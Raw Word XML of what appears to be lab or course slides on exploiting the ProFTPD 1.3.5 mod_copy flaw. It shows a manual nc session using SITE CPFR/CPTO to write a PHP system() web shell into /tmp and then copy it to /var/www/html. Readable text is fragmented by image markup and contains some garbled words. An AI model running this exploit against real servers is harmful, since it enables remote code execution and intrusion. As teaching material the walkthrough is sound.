            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>9867900</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>285750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="561975" cy="828675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="216092" name="Picture 21609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6092" name="Picture 216092"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId141"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="561975" cy="8286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2"/>
        </w:rPr>
        <w:t>The command is included as an HT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">TP GET variable &amp; executed with PHP! </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08D2D227" wp14:editId="1AD4D113">
            <wp:extent cx="495300" cy="1047750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340805" name="Picture 34080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805" name="Picture 340805"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId142"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="495300" cy="1047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577561" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="220"/>
        <w:ind w:left="430" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:t>The difference between the Ruby script and the Python 2 script for exploiting ProFTPd:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573EC402" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t>Copies from / proc/ self/cmdline...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF25C4B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="360"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="58"/>
        </w:rPr>
        <w:t>This includes the filenames used in the mod_copy operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CB5B5F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="415" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71659480" wp14:editId="60FEE118">
            <wp:extent cx="594360" cy="152400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340810" name="Picture 3408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810" name="Picture 340810"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1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54"/>
        </w:rPr>
        <w:t xml:space="preserve">Toa fake file, /tmp/&lt;?php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D0E3375" wp14:editId="14D8CBE6">
            <wp:extent cx="3665220" cy="289560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="216848" name="Picture 21684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6848" name="Picture 216848"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId144"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3665220" cy="28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54"/>
        </w:rPr>
        <w:t xml:space="preserve"> ? &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157D3936" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>Notice this is in /tmp, a world-writable directory!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00087D1A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="290"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="62"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>No more Permission Denied error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B3EF90" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="190" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>The PHP code present in the filename is now in the file!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FA4C17" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t xml:space="preserve">We can now copy that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>file to the folder accessible to the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A460199" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="15612" w:right="-510"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C12F977" wp14:editId="5EF92BEF">
            <wp:extent cx="1363980" cy="1036320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="216849" name="Picture 21684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6849" name="Picture 216849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363980" cy="1036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B80C25" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="46"/>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="78"/>
        </w:rPr>
        <w:t>Let's see that manually as well:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:vertAnchor="text" w:tblpX="323" w:tblpY="804"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="16568" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="27" w:type="dxa"/>
          <w:left w:w="128" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="1245" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="16568"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="428DF5DA" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="3073"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="165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</w:tcPr>
          <w:p w14:paraId="61B6BECE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="4613"/>
              </w:tabs>
              <w:spacing w:after="15"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>root@kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:tab/>
              <w:t>nc 192.168. 229.105 21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AC2DD19" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:before="2" w:after="0" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="15" w:right="4665" w:hanging="15"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251706368" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="18176AA2" wp14:editId="55629786">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>566738</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>-29961</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="914400" cy="28575"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="226979" name="Picture 22697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6979" name="Picture 226979"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId14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28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707392" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="425BE53E" wp14:editId="5A765523">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>3224213</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>-20436</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="723900" cy="19050"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="226911" name="Picture 22691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6911" name="Picture 226911"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId14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3900" cy="19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sz w:val="48"/>
              </w:rPr>
              <w:t xml:space="preserve">220 ProFTPD 1.3.5 server (Great job! ) [172.17.e.2] site cpfr /proc/self/cmdline </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08AD02D9" wp14:editId="7052FE38">
                  <wp:extent cx="1181100" cy="257175"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="227043" name="Picture 22704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7043" name="Picture 227043"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId14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1100" cy="2571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3AEF9DCF" wp14:editId="1585E498">
                  <wp:extent cx="1181100" cy="9525"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="227088" name="Picture 22708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7088" name="Picture 227088"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId14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1100" cy="9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0A8D003" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="15"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="48"/>
              </w:rPr>
              <w:t>350 File or directory exists, ready for destination name</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4740EB51" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="40"/>
              <w:ind w:left="1830"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C9F5F41" wp14:editId="191617C2">
                  <wp:extent cx="3409950" cy="9525"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="340814" name="Picture 34081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0814" name="Picture 340814"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId14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09950" cy="9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0904F4E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="15"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t xml:space="preserve">site cpto /tmp/&lt;?php system("whoami") ? </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F9A2A77" wp14:editId="585C11E3">
                  <wp:extent cx="123825" cy="47625"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="226138" name="Picture 22613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6138" name="Picture 226138"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId15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825" cy="47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42"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B3F24BF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="22"/>
              <w:ind w:left="11595"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F2718A4" wp14:editId="79E929FC">
                  <wp:extent cx="1638300" cy="38100"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="227203" name="Picture 22720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7203" name="Picture 227203"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId15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38300" cy="38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071A32F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="8948"/>
                <w:tab w:val="center" w:pos="12885"/>
              </w:tabs>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251708416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="00FCA3A9" wp14:editId="771F284A">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>7443788</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>338248</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1638300" cy="142875"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="227068" name="Picture 22706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7068" name="Picture 227068"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId15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38300" cy="142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sz w:val="48"/>
              </w:rPr>
              <w:t>250 Copy successful</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01598AEF" wp14:editId="6333AEFD">
                  <wp:extent cx="1285875" cy="295275"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="227140" name="Picture 22714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7140" name="Picture 227140"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId15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5875" cy="295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48"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50CD1AA5" wp14:editId="6783FF1C">
                  <wp:extent cx="1362075" cy="295275"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="227153" name="Picture 22715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7153" name="Picture 227153"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId15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2075" cy="295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48"/>
              </w:rPr>
              <w:tab/>
              <w:t>Success!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="0F8AE02B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1847"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="165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</w:tcPr>
          <w:p w14:paraId="5B1D7360" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="right" w:pos="15195"/>
              </w:tabs>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251709440" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="4DDEC6D6" wp14:editId="767EEEA2">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>566738</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>225985</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="114300" cy="19050"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="226169" name="Picture 22616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6169" name="Picture 226169"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId15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" cy="19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710464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="7E95B675" wp14:editId="50859F36">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>3805238</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>225985</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="762000" cy="28575"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="340816" name="Picture 34081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0816" name="Picture 340816"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId15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2000" cy="28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sz w:val="42"/>
              </w:rPr>
              <w:t xml:space="preserve">site cpfr /tmp/&lt;?php system("whoami") ? </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3139CC6F" wp14:editId="116494CB">
                  <wp:extent cx="123825" cy="47625"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="226131" name="Picture 22613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6131" name="Picture 226131"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId15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825" cy="47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42"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AACFABF" wp14:editId="391C6AC5">
                  <wp:extent cx="1362075" cy="219075"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="227097" name="Picture 22709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7097" name="Picture 227097"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId15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2075" cy="219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42"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1238EB4D" wp14:editId="2CA79362">
                  <wp:extent cx="2286000" cy="238125"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="227180" name="Picture 22718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7180" name="Picture 227180"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId15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38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3E01926" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="15" w:right="3450"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251711488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="33CDE919" wp14:editId="7D743D65">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>566738</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>513488</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="133350" cy="9525"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="226216" name="Picture 22621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6216" name="Picture 226216"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId15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350" cy="9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sz w:val="44"/>
              </w:rPr>
              <w:t xml:space="preserve">350 File </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F64394F" wp14:editId="72F78202">
                  <wp:extent cx="142875" cy="47625"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="226436" name="Picture 22643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6436" name="Picture 226436"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId16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2875" cy="47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44"/>
              </w:rPr>
              <w:t xml:space="preserve">or directory exists, ready for destination </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C437FBD" wp14:editId="6488369F">
                  <wp:extent cx="9525" cy="47625"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="226257" name="Picture 22625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6257" name="Picture 226257"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId16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25" cy="47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44"/>
              </w:rPr>
              <w:t xml:space="preserve">name site cpto /var/www/html/anything. php </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58A45E1B" wp14:editId="34BB24AD">
                  <wp:extent cx="1362075" cy="276225"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="227121" name="Picture 22712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7121" name="Picture 227121"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId16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2075" cy="276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731702B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="48"/>
              </w:rPr>
              <w:t>250 Copy successful</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EA8DF49" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="555"/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0A7AC5C9" wp14:editId="230267B1">
                      <wp:extent cx="809625" cy="28575"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:docPr id="341357" name="Group 34135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09625" cy="28575"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="809625" cy="2857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226276" name="Picture 226276"/>
                                <pic:cNvPicPr/>
                              </pic:nvPicPr>
                              <pic:blipFill>
                                <a:blip r:embed="rId16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33350" cy="285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226507" name="Picture 226507"/>
                                <pic:cNvPicPr/>
                              </pic:nvPicPr>
                              <pic:blipFill>
                                <a:blip r:embed="rId164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609600" y="0"/>
                                  <a:ext cx="200025" cy="285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a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <w:pict>
                    <v:group id="Group 341357" style="width:63.75pt;height:2.25pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="8096,285">
                      <v:shape id="Picture 226276" style="position:absolute;width:1333;height:285;left:0;top:0;" filled="f">
                        <v:imagedata r:id="rId165"/>
                      </v:shape>
                      <v:shape id="Picture 226507" style="position:absolute;width:2000;height:285;left:6096;top:0;" filled="f">
                        <v:imagedata r:id="rId166"/>
                      </v:shape>
                    </v:group>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5DC693A2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="5535" w:hanging="10"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251712512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="2E50C991" wp14:editId="6C519877">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>238125</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3552825</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="11039475" cy="1181100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="340818" name="Picture 3408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818" name="Picture 340818"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId167"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="11039475" cy="1181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inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1152F070" wp14:editId="35DEBF0C">
            <wp:extent cx="85725" cy="76200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="227292" name="Picture 22729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292" name="Picture 227292"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId168"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="85725" cy="7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52"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trying these commands yields much better results.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="261A88AB" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="28"/>
        <w:ind w:left="400" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>We can verify the results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F9C14A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
